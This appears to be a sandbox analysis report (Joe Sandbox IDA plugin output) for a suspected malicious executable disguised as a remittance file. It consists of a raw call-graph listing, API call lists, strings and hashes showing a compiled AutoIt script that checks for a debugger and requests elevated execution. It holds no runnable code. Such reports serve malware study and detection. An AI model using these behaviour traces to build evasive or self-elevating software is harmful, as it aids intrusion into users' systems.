VariantClear 86844->88016 88017 403cd0 86844->88017 88021 4731e1 VariantClear 86844->88021 88022 4331a2 6 API calls 86844->88022 86845->86613 86846->86598 86847->86605 86849 401b16 _wcslen 86848->86849 86850 4115d7 52 API calls 86849->86850 86853 401b63 86849->86853 86851 401b4b _memmove 86850->86851 86852 4115d7 52 API calls 86851->86852 86852->86853 86854 40d200 52 API calls 2 library calls 86853->86854 86854->86620 86855->86623 86857 40bc70 52 API calls 86856->86857 86858 401f31 86857->86858 86859 402560 86858->86859 86860 40256d __write_nolock 86859->86860 86861 402160 52 API calls 86860->86861 86863 402593 86861->86863 86867 4025bd 86863->86867 86934 401c90 86863->86934 86864 4026f0 52 API calls 86864->86867 86865 4026db 86865->86678 86866 4026a7 86866->86865 86868 401b10 52 API calls 86866->86868 86867->86864 86867->86866 86869 401b10 52 API calls 86867->86869 86871 401c90 52 API calls 86867->86871 86937 40d7c0 52 API calls 2 library calls 86867->86937 86870 4026d1 86868->86870 86869->86867 86938 40d7c0 52 API calls 2 library calls 86870->86938 86871->86867 86939 40f760 86874->86939 86877 410118 86877->86680 86879 42805d 86882 42806a 86879->86882 86995 431e58 86879->86995 86881 413748 _free 46 API calls 86883 428078 86881->86883 86882->86881 86884 431e58 82 API calls 86883->86884 86885 428084 86884->86885 86885->86680 86887 4115d7 52 API calls 86886->86887 86888 401f74 86887->86888 86888->86683 86890 4019a3 86889->86890 86894 401985 86889->86894 86891 4019b8 86890->86891 86890->86894 87601 403e10 53 API calls 86891->87601 86893 40199f 86893->86686 86894->86893 87600 403e10 53 API calls 86894->87600 86895 4019c4 86895->86686 86898 40c2c7 86897->86898 86899 40c30e 86897->86899 86900 40c2d3 86898->86900 86907 426c79 86898->86907 86901 40c315 86899->86901 86902 426c2b 86899->86902 87602 403ea0 52 API calls __cinit 86900->87602 86905 40c321 86901->86905 86906 426c5a 86901->86906 86904 426c4b 86902->86904 86908 426c2e 86902->86908 87605 4534e3 52 API calls 
86904->87605 87603 403ea0 52 API calls __cinit 86905->87603 87606 4534e3 52 API calls 86906->87606 87607 4534e3 52 API calls 86907->87607 86913 40c2de 86908->86913 87604 4534e3 52 API calls 86908->87604 86913->86696 86916 401a30 86915->86916 86917 401a17 86915->86917 86919 402160 52 API calls 86916->86919 86918 401a2d 86917->86918 87608 403c30 52 API calls _memmove 86917->87608 86918->86700 86921 401a3d 86919->86921 86921->86700 86923 411523 86922->86923 86924 4114ba 86922->86924 87611 4113a8 58 API calls 3 library calls 86923->87611 86928 40200c 86924->86928 87609 417f77 46 API calls __getptd_noexit 86924->87609 86927 4114c6 87610 417f25 10 API calls _xtow_s@20 86927->87610 86928->86703 86928->86704 86930->86732 86931->86735 86932->86739 86933->86739 86935 4026f0 52 API calls 86934->86935 86936 401c97 86935->86936 86936->86863 86937->86867 86938->86865 86999 40f6f0 86939->86999 86941 40f77b _strcat ctype 87007 40f850 86941->87007 86946 427c2a 87036 414d04 86946->87036 86948 40f7fc 86948->86946 86950 40f804 86948->86950 87023 414a46 86950->87023 86953 40f80e 86953->86877 86958 4528bd 86953->86958 86955 427c59 87042 414fe2 86955->87042 86957 427c79 86959 4150d1 _fseek 81 API calls 86958->86959 86960 452930 86959->86960 87542 452719 86960->87542 86963 452948 86963->86879 86964 414d04 __fread_nolock 61 API calls 86965 452966 86964->86965 86966 414d04 __fread_nolock 61 API calls 86965->86966 86967 452976 86966->86967 86968 414d04 __fread_nolock 61 API calls 86967->86968 86969 45298f 86968->86969 86970 414d04 __fread_nolock 61 API calls 86969->86970 86971 4529aa 86970->86971 86972 4150d1 _fseek 81 API calls 86971->86972 86973 4529c4 86972->86973 86974 4135bb _malloc 46 API calls 86973->86974 86975 4529cf 86974->86975 86976 4135bb _malloc 46 API calls 86975->86976 86977 4529db 86976->86977 86978 414d04 __fread_nolock 61 API calls 86977->86978 86979 4529ec 86978->86979 86980 44afef GetSystemTimeAsFileTime 86979->86980 86981 452a00 86980->86981 86982 452a36 86981->86982 
86983 452a13 86981->86983 86984 452aa5 86982->86984 86985 452a3c 86982->86985 86986 413748 _free 46 API calls 86983->86986 86988 413748 _free 46 API calls 86984->86988 87548 44b1a9 86985->87548 86989 452a1c 86986->86989 86991 452aa3 86988->86991 86992 413748 _free 46 API calls 86989->86992 86990 452a9d 86993 413748 _free 46 API calls 86990->86993 86991->86879 86994 452a25 86992->86994 86993->86991 86994->86879 86996 431e64 86995->86996 86997 431e6a 86995->86997 86998 414a46 __fcloseall 82 API calls 86996->86998 86997->86882 86998->86997 87000 425de2 86999->87000 87004 40f6fc _wcslen 86999->87004 87000->86941 87001 40f710 WideCharToMultiByte 87002 40f756 87001->87002 87003 40f728 87001->87003 87002->86941 87005 4115d7 52 API calls 87003->87005 87004->87001 87006 40f735 WideCharToMultiByte 87005->87006 87006->86941 87009 40f85d __crtGetStringTypeA_stat _strlen 87007->87009 87010 40f7ab 87009->87010 87055 414db8 87009->87055 87011 4149c2 87010->87011 87070 414904 87011->87070 87013 40f7e9 87013->86946 87014 40f5c0 87013->87014 87015 40f5cd _strcat __write_nolock _memmove 87014->87015 87016 414d04 __fread_nolock 61 API calls 87015->87016 87018 425d11 87015->87018 87022 40f691 __tzset_nolock 87015->87022 87158 4150d1 87015->87158 87016->87015 87019 4150d1 _fseek 81 API calls 87018->87019 87020 425d33 87019->87020 87021 414d04 __fread_nolock 61 API calls 87020->87021 87021->87022 87022->86948 87024 414a52 __tsopen_nolock 87023->87024 87025 414a64 87024->87025 87026 414a79 87024->87026 87298 417f77 46 API calls __getptd_noexit 87025->87298 87028 415471 __lock_file 47 API calls 87026->87028 87032 414a74 __tsopen_nolock 87026->87032 87030 414a92 87028->87030 87029 414a69 87299 417f25 10 API calls _xtow_s@20 87029->87299 87282 4149d9 87030->87282 87032->86953 87367 414c76 87036->87367 87038 414d1c 87039 44afef 87038->87039 87535 442c5a 87039->87535 87041 44b00d 87041->86955 87043 414fee __tsopen_nolock 87042->87043 87044 414ffa 87043->87044 87045 41500f 87043->87045 87539 
417f77 46 API calls __getptd_noexit 87044->87539 87047 415471 __lock_file 47 API calls 87045->87047 87049 415017 87047->87049 87048 414fff 87540 417f25 10 API calls _xtow_s@20 87048->87540 87051 414e4e __ftell_nolock 51 API calls 87049->87051 87052 415024 87051->87052 87541 41503d LeaveCriticalSection LeaveCriticalSection _fseek 87052->87541 87053 41500a __tsopen_nolock 87053->86957 87056 414dd6 87055->87056 87057 414deb 87055->87057 87066 417f77 46 API calls __getptd_noexit 87056->87066 87057->87056 87058 414df2 87057->87058 87068 41b91b 79 API calls 11 library calls 87058->87068 87061 414ddb 87067 417f25 10 API calls _xtow_s@20 87061->87067 87063 414e18 87064 414de6 87063->87064 87069 418f98 77 API calls 7 library calls 87063->87069 87064->87009 87066->87061 87067->87064 87068->87063 87069->87064 87073 414910 __tsopen_nolock 87070->87073 87071 414923 87126 417f77 46 API calls __getptd_noexit 87071->87126 87073->87071 87075 414951 87073->87075 87074 414928 87127 417f25 10 API calls _xtow_s@20 87074->87127 87089 41d4d1 87075->87089 87078 414956 87079 41496a 87078->87079 87080 41495d 87078->87080 87082 414992 87079->87082 87083 414972 87079->87083 87128 417f77 46 API calls __getptd_noexit 87080->87128 87106 41d218 87082->87106 87129 417f77 46 API calls __getptd_noexit 87083->87129 87084 414933 __tsopen_nolock @_EH4_CallFilterFunc@8 87084->87013 87090 41d4dd __tsopen_nolock 87089->87090 87091 4182cb __lock 46 API calls 87090->87091 87104 41d4eb 87091->87104 87092 41d567 87094 416b04 __malloc_crt 46 API calls 87092->87094 87093 41d560 87131 41d5fb 87093->87131 87096 41d56e 87094->87096 87096->87093 87098 41d57c InitializeCriticalSectionAndSpinCount 87096->87098 87097 41d5f0 __tsopen_nolock 87097->87078 87099 41d59c 87098->87099 87100 41d5af EnterCriticalSection 87098->87100 87103 413748 _free 46 API calls 87099->87103 87100->87093 87101 418209 __mtinitlocknum 46 API calls 87101->87104 87103->87093 87104->87092 87104->87093 87104->87101 87134 4154b2 47 API calls __lock 
87104->87134 87135 415520 LeaveCriticalSection LeaveCriticalSection _doexit 87104->87135 87107 41d23a 87106->87107 87108 41d255 87107->87108 87120 41d26c __wopenfile 87107->87120 87140 417f77 46 API calls __getptd_noexit 87108->87140 87110 41d421 87113 41d47a 87110->87113 87114 41d48c 87110->87114 87111 41d25a 87141 417f25 10 API calls _xtow_s@20 87111->87141 87145 417f77 46 API calls __getptd_noexit 87113->87145 87137 422bf9 87114->87137 87117 41499d 87130 4149b8 LeaveCriticalSection LeaveCriticalSection _fseek 87117->87130 87118 41d47f 87146 417f25 10 API calls _xtow_s@20 87118->87146 87120->87110 87120->87113 87120->87120 87142 41341f 58 API calls 2 library calls 87120->87142 87122 41d41a 87122->87110 87143 41341f 58 API calls 2 library calls 87122->87143 87124 41d439 87124->87110 87144 41341f 58 API calls 2 library calls 87124->87144 87126->87074 87127->87084 87128->87084 87129->87084 87130->87084 87136 4181f2 LeaveCriticalSection 87131->87136 87133 41d602 87133->87097 87134->87104 87135->87104 87136->87133 87147 422b35 87137->87147 87139 422c14 87139->87117 87140->87111 87141->87117 87142->87122 87143->87124 87144->87110 87145->87118 87146->87117 87148 422b41 __tsopen_nolock 87147->87148 87149 422b54 87148->87149 87151 422b8a 87148->87151 87150 417f77 _xtow_s@20 46 API calls 87149->87150 87152 422b59 87150->87152 87154 422400 __tsopen_nolock 109 API calls 87151->87154 87153 417f25 _xtow_s@20 10 API calls 87152->87153 87157 422b63 __tsopen_nolock 87153->87157 87155 422ba4 87154->87155 87156 422bcb __wsopen_helper LeaveCriticalSection 87155->87156 87156->87157 87157->87139 87161 4150dd __tsopen_nolock 87158->87161 87159 4150e9 87189 417f77 46 API calls __getptd_noexit 87159->87189 87161->87159 87162 41510f 87161->87162 87171 415471 87162->87171 87163 4150ee 87190 417f25 10 API calls _xtow_s@20 87163->87190 87170 4150f9 __tsopen_nolock 87170->87015 87172 415483 87171->87172 87173 4154a5 EnterCriticalSection 87171->87173 87172->87173 87174 41548b 87172->87174 
87175 415117 87173->87175 87176 4182cb __lock 46 API calls 87174->87176 87177 415047 87175->87177 87176->87175 87178 415067 87177->87178 87179 415057 87177->87179 87184 415079 87178->87184 87192 414e4e 87178->87192 87247 417f77 46 API calls __getptd_noexit 87179->87247 87183 41505c 87191 415143 LeaveCriticalSection LeaveCriticalSection _fseek 87183->87191 87209 41443c 87184->87209 87187 4150b9 87222 41e1f4 87187->87222 87189->87163 87190->87170 87191->87170 87193 414e61 87192->87193 87194 414e79 87192->87194 87248 417f77 46 API calls __getptd_noexit 87193->87248 87196 414139 __fputwc_nolock 46 API calls 87194->87196 87198 414e80 87196->87198 87197 414e66 87249 417f25 10 API calls _xtow_s@20 87197->87249 87200 41e1f4 __write 51 API calls 87198->87200 87201 414e97 87200->87201 87202 414f09 87201->87202 87204 414ec9 87201->87204 87208 414e71 87201->87208 87250 417f77 46 API calls __getptd_noexit 87202->87250 87205 41e1f4 __write 51 API calls 87204->87205 87204->87208 87206 414f64 87205->87206 87207 41e1f4 __write 51 API calls 87206->87207 87206->87208 87207->87208 87208->87184 87210 414455 87209->87210 87214 414477 87209->87214 87211 414139 __fputwc_nolock 46 API calls 87210->87211 87210->87214 87212 414470 87211->87212 87251 41b7b2 77 API calls 5 library calls 87212->87251 87215 414139 87214->87215 87216 414145 87215->87216 87217 41415a 87215->87217 87252 417f77 46 API calls __getptd_noexit 87216->87252 87217->87187 87219 41414a 87253 417f25 10 API calls _xtow_s@20 87219->87253 87221 414155 87221->87187 87223 41e200 __tsopen_nolock 87222->87223 87224 41e223 87223->87224 87225 41e208 87223->87225 87226 41e22f 87224->87226 87232 41e269 87224->87232 87274 417f8a 46 API calls __getptd_noexit 87225->87274 87276 417f8a 46 API calls __getptd_noexit 87226->87276 87229 41e20d 87275 417f77 46 API calls __getptd_noexit 87229->87275 87231 41e234 87277 417f77 46 API calls __getptd_noexit 87231->87277 87254 41ae56 87232->87254 87235 41e23c 87278 417f25 10 API calls _xtow_s@20 
87235->87278 87236 41e26f 87237 41e291 87236->87237 87238 41e27d 87236->87238 87279 417f77 46 API calls __getptd_noexit 87237->87279 87264 41e17f 87238->87264 87242 41e215 __tsopen_nolock 87242->87183 87243 41e289 87281 41e2c0 LeaveCriticalSection __unlock_fhandle 87243->87281 87244 41e296 87280 417f8a 46 API calls __getptd_noexit 87244->87280 87247->87183 87248->87197 87249->87208 87250->87208 87251->87214 87252->87219 87253->87221 87255 41ae62 __tsopen_nolock 87254->87255 87256 41aebc 87255->87256 87258 4182cb __lock 46 API calls 87255->87258 87257 41aec1 EnterCriticalSection 87256->87257 87260 41aede __tsopen_nolock 87256->87260 87257->87260 87259 41ae8e 87258->87259 87261 41aeaa 87259->87261 87262 41ae97 InitializeCriticalSectionAndSpinCount 87259->87262 87260->87236 87263 41aeec ___lock_fhandle LeaveCriticalSection 87261->87263 87262->87261 87263->87256 87265 41aded __close_nolock 46 API calls 87264->87265 87266 41e18e 87265->87266 87267 41e1a4 SetFilePointer 87266->87267 87268 41e194 87266->87268 87270 41e1c3 87267->87270 87271 41e1bb GetLastError 87267->87271 87269 417f77 _xtow_s@20 46 API calls 87268->87269 87272 41e199 87269->87272 87270->87272 87273 417f9d __dosmaperr 46 API calls 87270->87273 87271->87270 87272->87243 87273->87272 87274->87229 87275->87242 87276->87231 87277->87235 87278->87242 87279->87244 87280->87243 87281->87242 87283 4149ea 87282->87283 87284 4149fe 87282->87284 87328 417f77 46 API calls __getptd_noexit 87283->87328 87286 4149fa 87284->87286 87288 41443c __flush 77 API calls 87284->87288 87300 414ab2 LeaveCriticalSection LeaveCriticalSection _fseek 87286->87300 87287 4149ef 87329 417f25 10 API calls _xtow_s@20 87287->87329 87290 414a0a 87288->87290 87301 41d8c2 87290->87301 87293 414139 __fputwc_nolock 46 API calls 87294 414a18 87293->87294 87305 41d7fe 87294->87305 87296 414a1e 87296->87286 87297 413748 _free 46 API calls 87296->87297 87297->87286 87298->87029 87299->87032 87300->87032 87302 414a12 87301->87302 87303 41d8d2 
87301->87303 87302->87293 87303->87302 87304 413748 _free 46 API calls 87303->87304 87304->87302 87306 41d80a __tsopen_nolock 87305->87306 87307 41d812 87306->87307 87308 41d82d 87306->87308 87345 417f8a 46 API calls __getptd_noexit 87307->87345 87309 41d839 87308->87309 87314 41d873 87308->87314 87347 417f8a 46 API calls __getptd_noexit 87309->87347 87312 41d817 87346 417f77 46 API calls __getptd_noexit 87312->87346 87313 41d83e 87348 417f77 46 API calls __getptd_noexit 87313->87348 87317 41ae56 ___lock_fhandle 48 API calls 87314->87317 87319 41d879 87317->87319 87318 41d846 87349 417f25 10 API calls _xtow_s@20 87318->87349 87322 41d893 87319->87322 87323 41d887 87319->87323 87320 41d81f __tsopen_nolock 87320->87296 87350 417f77 46 API calls __getptd_noexit 87322->87350 87330 41d762 87323->87330 87326 41d88d 87351 41d8ba LeaveCriticalSection __unlock_fhandle 87326->87351 87328->87287 87329->87286 87352 41aded 87330->87352 87332 41d7c8 87365 41ad67 47 API calls 2 library calls 87332->87365 87334 41d772 87334->87332 87336 41aded __close_nolock 46 API calls 87334->87336 87344 41d7a6 87334->87344 87335 41d7d0 87338 41d7f2 87335->87338 87366 417f9d 46 API calls 3 library calls 87335->87366 87339 41d79d 87336->87339 87337 41aded __close_nolock 46 API calls 87340 41d7b2 CloseHandle 87337->87340 87338->87326 87342 41aded __close_nolock 46 API calls 87339->87342 87340->87332 87343 41d7be GetLastError 87340->87343 87342->87344 87343->87332 87344->87332 87344->87337 87345->87312 87346->87320 87347->87313 87348->87318 87349->87320 87350->87326 87351->87320 87353 41adfa 87352->87353 87355 41ae12 87352->87355 87354 417f8a __tsopen_nolock 46 API calls 87353->87354 87356 41adff 87354->87356 87357 417f8a __tsopen_nolock 46 API calls 87355->87357 87358 41ae51 87355->87358 87359 417f77 _xtow_s@20 46 API calls 87356->87359 87360 41ae23 87357->87360 87358->87334 87361 41ae07 87359->87361 87362 417f77 _xtow_s@20 46 API calls 87360->87362 87361->87334 87363 41ae2b 87362->87363 87364 
                                                                      APIs
                                                                      • _wcslen.LIBCMT ref: 004096C1
                                                                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                      • _memmove.LIBCMT ref: 0040970C
                                                                        • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                        • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                        • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                      • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00000000), ref: 00409753
                                                                      • _memmove.LIBCMT ref: 00409D96
                                                                      • _memmove.LIBCMT ref: 0040A6C4
                                                                      • _memmove.LIBCMT ref: 004297E5
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: _memmove$std::exception::exception$BuffCharException@8ThrowUpper_malloc_wcslen
                                                                      • String ID:
                                                                      • API String ID: 2383988440-0
                                                                      • Opcode ID: 0c7f704c1111840706a6f5d41559473282fc5ae19e9abcecf6c32e7dc2e8fb44
                                                                      • Instruction ID: 3262ed4b583d717621f118bf118656dde374edbe3d76219253c131e703a2432c
                                                                      • Opcode Fuzzy Hash: 0c7f704c1111840706a6f5d41559473282fc5ae19e9abcecf6c32e7dc2e8fb44
                                                                      • Instruction Fuzzy Hash: CD13BF706043109FD724DF25D480A2BB7E1BF89304F54896EE8869B392D739EC56CB9B

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 0040D5AA
                                                                        • Part of subcall function 00401F20: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe,00000104,?), ref: 00401F4C
                                                                        • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402007
                                                                        • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 0040201D
                                                                        • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402033
                                                                        • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402049
                                                                        • Part of subcall function 00401F20: _wcscpy.LIBCMT ref: 0040207C
                                                                      • IsDebuggerPresent.KERNEL32 ref: 0040D5B6
                                                                      • GetFullPathNameW.KERNEL32(C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe,00000104,?,004A7F50,004A7F54), ref: 0040D625
                                                                        • Part of subcall function 00401460: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 004014A5
                                                                      • SetCurrentDirectoryW.KERNEL32(?,00000001), ref: 0040D699
                                                                      • MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,00484C92,00000010), ref: 0042E1C9
                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 0042E238
                                                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0042E268
                                                                      • GetForegroundWindow.USER32(runas,?,?,?,00000001), ref: 0042E2B2
                                                                      • ShellExecuteW.SHELL32(00000000), ref: 0042E2B9
                                                                        • Part of subcall function 00410390: GetSysColorBrush.USER32(0000000F), ref: 0041039B
                                                                        • Part of subcall function 00410390: LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                                                                        • Part of subcall function 00410390: LoadIconW.USER32(?,00000063), ref: 004103C0
                                                                        • Part of subcall function 00410390: LoadIconW.USER32(?,000000A4), ref: 004103D3
                                                                        • Part of subcall function 00410390: LoadIconW.USER32(?,000000A2), ref: 004103E6
                                                                        • Part of subcall function 00410390: LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                                                                        • Part of subcall function 00410390: RegisterClassExW.USER32(?), ref: 0041045D
                                                                        • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
                                                                        • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
                                                                        • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105E4
                                                                        • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105EE
                                                                        • Part of subcall function 0040E0C0: Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E1A7
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: LoadWindow$IconName__wcsicoll$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcscpy
                                                                      • String ID: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe$This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas
                                                                      • API String ID: 2495805114-4081437977
                                                                      • Opcode ID: a40813cb8be74a7845095afbf10676f30eabccecee99da57b5cbcca8d29a6aad
                                                                      • Instruction ID: d8104b1e62918721d1641daf81013a976a0e8d4b3b5b72af0edf1e1af392be53
                                                                      • Opcode Fuzzy Hash: a40813cb8be74a7845095afbf10676f30eabccecee99da57b5cbcca8d29a6aad
                                                                      • Instruction Fuzzy Hash: A3513B71A48201AFD710B7E1AC45BEE3B689B59714F4049BFF905672D2CBBC4A88C72D

                                                                      Control-flow Graph

                                                                      Control-flow graph for the function at 0040E500 (interactive graph residue omitted; legend: Executed / Not Executed). Named calls in this graph: GetVersionExW, GetCurrentProcess, GetSystemInfo, GetNativeSystemInfo, FreeLibrary, plus the LoadLibraryA/GetProcAddress resolver subroutines at 0040EF60, 0040EF90 and 0040EFD0.
                                                                      APIs
                                                                      • GetVersionExW.KERNEL32(?), ref: 0040E52A
                                                                        • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                        • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                      • GetCurrentProcess.KERNEL32(?), ref: 0040E5D4
                                                                      • GetNativeSystemInfo.KERNELBASE(?), ref: 0040E632
                                                                      • FreeLibrary.KERNEL32(?), ref: 0040E642
                                                                      • FreeLibrary.KERNEL32(?), ref: 0040E654
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: FreeLibrary$CurrentInfoNativeProcessSystemVersion_memmove_wcslen
                                                                      • String ID: 0SH
                                                                      • API String ID: 3363477735-851180471
                                                                      • Opcode ID: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                                                                      • Instruction ID: 6dc39e8e7f592ebea2fdbb3e4710260bd4e3e134fe0a85e77c096ec086c2d55c
                                                                      • Opcode Fuzzy Hash: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                                                                      • Instruction Fuzzy Hash: E361C170908656EECB10CFA9D84429DFBB0BF19308F54496ED404A3B42D379E969CB9A
                                                                      APIs
                                                                      • LoadLibraryA.KERNELBASE(uxtheme.dll,0040EBB5,0040D72E), ref: 0040EBDB
                                                                      • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0040EBED
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: AddressLibraryLoadProc
                                                                      • String ID: IsThemeActive$uxtheme.dll
                                                                      • API String ID: 2574300362-3542929980
                                                                      • Opcode ID: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                                                                      • Instruction ID: d0aec1e7cdd3fc231052cfb2f432bc7d0e698e699ac1f50efe2d89ca8b78c0bc
                                                                      • Opcode Fuzzy Hash: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                                                                      • Instruction Fuzzy Hash: D6D0C7B49407039AD7305F71C91871B76E47B50751F104C3DF946A1294DB7CD040D768
                                                                      APIs
                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409266
                                                                      • Sleep.KERNEL32(0000000A,?), ref: 004094D1
                                                                      • TranslateMessage.USER32(?), ref: 00409556
                                                                      • DispatchMessageW.USER32(?), ref: 00409561
                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409574
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Message$Peek$DispatchSleepTranslate
                                                                      • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE
                                                                      • API String ID: 1762048999-758534266
                                                                      • Opcode ID: 23d079a985ba2b1b40b9133d067a4c416b55a71ed9da253c2d941bd9d0d29544
                                                                      • Instruction ID: 6221a9036d09df45d33125ba93b856da71e554157a22c4cdc10a0b2ba1356448
